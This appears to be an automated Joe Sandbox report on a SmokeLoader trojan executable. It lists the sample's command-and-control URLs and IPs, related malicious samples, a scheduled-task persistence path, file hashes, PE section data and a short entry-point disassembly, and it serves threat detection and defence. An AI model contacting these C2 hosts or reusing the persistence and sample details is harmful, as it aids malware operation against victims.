        http://nwgrus.ru/tmp/index.phptrue
          unknown
          http://tech-servers.in.net/tmp/index.phptrue
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
              unknown
              https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                unknown
                https://excel.office.comexplorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.microexplorer.exe, 00000001.00000000.1745408529.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1744921630.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1746652711.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://api.msn.com/qexplorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1748271457.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1748271457.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1748271457.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://word.office.comexplorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1744130218.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1745872183.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1744130218.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://api.msn.com/explorer.exe, 00000001.00000000.1745872183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://outlook.com_explorer.exe, 00000001.00000000.1748271457.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1744130218.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            116.58.10.60
                                            unknownPakistan
                                            17563NEXLINX-AS-APAutonomousSystemNumberforNexlinxPKtrue
                                            123.213.233.131
                                            unicea.wsKorea Republic of
                                            9318SKB-ASSKBroadbandCoLtdKRtrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1537536
                                            Start date and time:2024-10-19 06:41:04 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 7m 40s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:7
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:50f86ebddd156619b173883981364d8955365d76d2c3a.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@2/2@61/2
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 30
                                            • Number of non-executed functions: 9
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            TimeTypeDescription
                                            00:42:23API Interceptor444432x Sleep call for process: explorer.exe modified
                                            05:42:22Task SchedulerRun new task: Firefox Default Browser Agent A57227A213EF99E5 path: C:\Users\user\AppData\Roaming\vbirvce
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            116.58.10.60wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                            • nwgrus.ru/tmp/index.php
                                            KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                            • nwgrus.ru/tmp/index.php
                                            7zaC3J8wBV.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                            • 100xmargin.com/tmp/index.php
                                            uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                            • gebeus.ru/tmp/index.php
                                            a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                            • bipto.org/tmp/index.php
                                            123.213.233.1316e41bbf45206030f9a1277d06f28e467d8877ad2b0ea2.exeGet hashmaliciousSmokeLoaderBrowse
                                            • unicea.ws/tmp/index.php
                                            t3TkmcMmcA.exeGet hashmaliciousSmokeLoaderBrowse
                                            • tnc-corp.ru/tmp/index.php
                                            JeFu7HwJRa.exeGet hashmaliciousSmokeLoaderBrowse
                                            • epohe.ru/tmp/
                                            z0PrDUH3Ab.exeGet hashmaliciousSmokeLoaderBrowse
                                            • movlat.com/tmp/
                                            PADD8toZVX.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                            • sdfjhuz.com/dl/build2.exe
                                            etNheGz9UQ.exeGet hashmaliciousGlupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5SystemzBrowse
                                            • humydrole.com/tmp/index.php
                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                            • humydrole.com/tmp/index.php
                                            file.exeGet hashmaliciousGlupteba, Petite Virus, RedLine, SmokeLoader, Socks5SystemzBrowse
                                            • humydrole.com/tmp/index.php
                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                            • humydrole.com/tmp/index.php
                                            sGNsvCLzq0.exeGet hashmaliciousSmokeLoaderBrowse
                                            • humydrole.com/tmp/index.php
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            unicea.wsbdSfcB8sLh.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 197.164.156.210
                                            6e41bbf45206030f9a1277d06f28e467d8877ad2b0ea2.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 197.164.156.210
                                            llZnKf40fR.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 63.143.98.185
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            NEXLINX-AS-APAutonomousSystemNumberforNexlinxPKwBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 116.58.10.60
                                            KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 116.58.10.60
                                            7zaC3J8wBV.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                            • 116.58.10.60
                                            uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 116.58.10.60
                                            y7cm9CKSN9.elfGet hashmaliciousMiraiBrowse
                                            • 116.58.43.103
                                            yJgVAg26w0.elfGet hashmaliciousMiraiBrowse
                                            • 116.58.43.106
                                            7ZEAQv0SZ6.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 202.59.68.26
                                            7048CflwYY.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                            • 116.58.10.59
                                            a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                            • 116.58.10.60
                                            2.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 116.58.10.60
                                            SKB-ASSKBroadbandCoLtdKR6e41bbf45206030f9a1277d06f28e467d8877ad2b0ea2.exeGet hashmaliciousSmokeLoaderBrowse
                                            • 123.213.233.131
                                            Qb8aDBHtQi.elfGet hashmaliciousUnknownBrowse
                                            • 180.68.127.108
                                            mirai.ppc.elfGet hashmaliciousMiraiBrowse
                                            • 211.213.102.69
                                            mirai.mips.elfGet hashmaliciousMiraiBrowse
                                            • 58.232.123.65
                                            EMnyl2klUV.elfGet hashmaliciousMiraiBrowse
                                            • 211.117.104.68
                                            spc.elfGet hashmaliciousMiraiBrowse
                                            • 218.52.2.124
                                            mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 114.201.2.15
                                            mips.elfGet hashmaliciousMiraiBrowse
                                            • 211.206.13.90
                                            armv6l.elfGet hashmaliciousUnknownBrowse
                                            • 116.126.1.94
                                            ppc.elfGet hashmaliciousMiraiBrowse
                                            • 219.249.234.192
                                            No context
                                            No context
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):454144
                                            Entropy (8bit):6.357429709130068
                                            Encrypted:false
                                            SSDEEP:6144:HodLe5U3K0CfIvA2fLLRRjThRIDVNrEu+MykNso/0S2y6BbO42T8:6i5UafTsLbjTh2DzL+r2eNO4O
                                            MD5:EA2E25EFD40CEBD5E9535B91D8E3F61F
                                            SHA1:85AFD5690C90716EB35FE57E78C1204EE7C6EB22
                                            SHA-256:50F86EBDDD156619B173883981364D8955365D76D2C3AE9391EC911E65551BE9
                                            SHA-512:CF4BF97674BA99A43A81BD594AF91AE11B0FB32A1BF4224EFF39EEE56E7CA6C125CA88E073A0342E0AD8F844386ADB6C8406BA66050B8110E1B25194542F6997
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 74%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L...n..d.............................;............@..................................9......................................@...x......................................................................@............................................text............................... ..`.rdata.............................@..@.data............`..................@....guj................................@..@.ber................................@..@.medajim............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................
                                            Process:C:\Windows\explorer.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.357429709130068
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:50f86ebddd156619b173883981364d8955365d76d2c3a.exe
                                            File size:454'144 bytes
                                            MD5:ea2e25efd40cebd5e9535b91d8e3f61f
                                            SHA1:85afd5690c90716eb35fe57e78c1204ee7c6eb22
                                            SHA256:50f86ebddd156619b173883981364d8955365d76d2c3ae9391ec911e65551be9
                                            SHA512:cf4bf97674ba99a43a81bd594af91ae11b0fb32a1bf4224eff39eee56e7ca6c125ca88e073a0342e0ad8f844386adb6c8406ba66050b8110e1b25194542f6997
                                            SSDEEP:6144:HodLe5U3K0CfIvA2fLLRRjThRIDVNrEu+MykNso/0S2y6BbO42T8:6i5UafTsLbjTh2DzL+r2eNO4O
                                            TLSH:06A4C00262B5AEE0F7D64A338D1DE6E8A66DF851EE186777321E3B1F1B70571C222311
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L...n..d...................
                                            Icon Hash:41294945514d610d
                                            Entrypoint:0x403bf9
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x64B2FF6E [Sat Jul 15 20:19:58 2023 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:cf2df69e8bb6acbf3b231da2c6f4bda2
                                            Instruction
                                            call 00007F436CF65CF9h
                                            jmp 00007F436CF62C4Eh
                                            push dword ptr [00451258h]
                                            call dword ptr [0040F12Ch]
                                            test eax, eax
                                            je 00007F436CF62DC4h
                                            call eax
                                            push 00000019h
                                            call 00007F436CF655DBh
                                            push 00000001h
                                            push 00000000h
                                            call 00007F436CF62580h
                                            add esp, 0Ch
                                            jmp 00007F436CF62545h
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 20h
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            push edi
                                            push 00000008h
                                            pop ecx
                                            mov esi, 0040F3C0h
                                            lea edi, dword ptr [ebp-20h]
                                            rep movsd
                                            mov dword ptr [ebp-08h], eax
                                            mov eax, dword ptr [ebp+0Ch]
                                            pop edi
                                            mov dword ptr [ebp-04h], eax
                                            pop esi
                                            test eax, eax
                                            je 00007F436CF62DCEh
                                            test byte ptr [eax], 00000008h
                                            je 00007F436CF62DC9h
                                            mov dword ptr [ebp-0Ch], 01994000h
                                            lea eax, dword ptr [ebp-0Ch]
                                            push eax
                                            push dword ptr [ebp-10h]
                                            push dword ptr [ebp-1Ch]
                                            push dword ptr [ebp-20h]
                                            call dword ptr [0040F160h]
                                            leave
                                            retn 0008h
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            push ecx
                                            push ebx
                                            mov eax, dword ptr [ebp+0Ch]
                                            add eax, 0Ch
                                            mov dword ptr [ebp-04h], eax
                                            mov ebx, dword ptr fs:[00000000h]
                                            mov eax, dword ptr [ebx]
                                            mov dword ptr fs:[00000000h], eax
                                            mov eax, dword ptr [ebp+08h]
                                            mov ebx, dword ptr [ebp+0Ch]
                                            mov ebp, dword ptr [ebp-04h]
                                            mov esp, dword ptr [ebx-04h]
                                            jmp eax
                                            pop ebx
                                            leave
                                            retn 0008h
                                            pop eax
                                            pop ecx
                                            xchg dword ptr [esp], eax
                                            jmp eax
                                            pop eax
                                            pop ecx
                                            xchg dword ptr [esp], eax
                                            jmp eax
                                            pop eax
                                            pop ecx
                                            xchg dword ptr [esp], eax
                                            jmp eax
                                            Programming Language:
                                            • [ASM] VS2010 build 30319
                                            • [C++] VS2010 build 30319
                                            • [ C ] VS2010 build 30319
                                            • [IMP] VS2008 SP1 build 30729
                                            • [RES] VS2010 build 30319
                                            • [LNK] VS2010 build 30319
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x49b400x78.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x1f108.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x49bb80x1c.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x490c80x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0xf0000x1fc.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000xd4dd0xd6002039712dbf7a50bd45433c889e87fcc3False0.6018910630841121data6.671203412552697IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0xf0000x3b6d20x3b8002c06279e133be36d01ccfae1bcdf0cfbFalse0.7520803243172269data6.870956222424823IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x4b0000x11cc00x6000648a35f029250a8b7b7d327c0ee5cba4False0.0838623046875data1.0912838539385947IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .guj0x5d0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .ber0x5e0000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .medajim0x5f0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x600000x1f1080x1f200af0679af61ade9ddd6c88c0067976997False0.4242124748995984data5.055365166130212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_CURSOR0x79b780x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                            RT_CURSOR0x79ea80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                            RT_CURSOR0x7a0000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                            RT_CURSOR0x7aea80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                            RT_CURSOR0x7b7500x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                            RT_CURSOR0x7bce80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                            RT_CURSOR0x7cb900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                            RT_CURSOR0x7d4380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                            RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3694029850746269
                                            RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3694029850746269
                                            RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4553249097472924
                                            RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4553249097472924
                                            RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.4619815668202765
                                            RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.4619815668202765
                                            RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4552023121387283
                                            RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4552023121387283
                                            RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2682572614107884
                                            RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2682572614107884
                                            RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.3074577861163227
                                            RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.3074577861163227
                                            RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3599290780141844
                                            RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3599290780141844
                                            RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.5660980810234542
                                            RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.5660980810234542
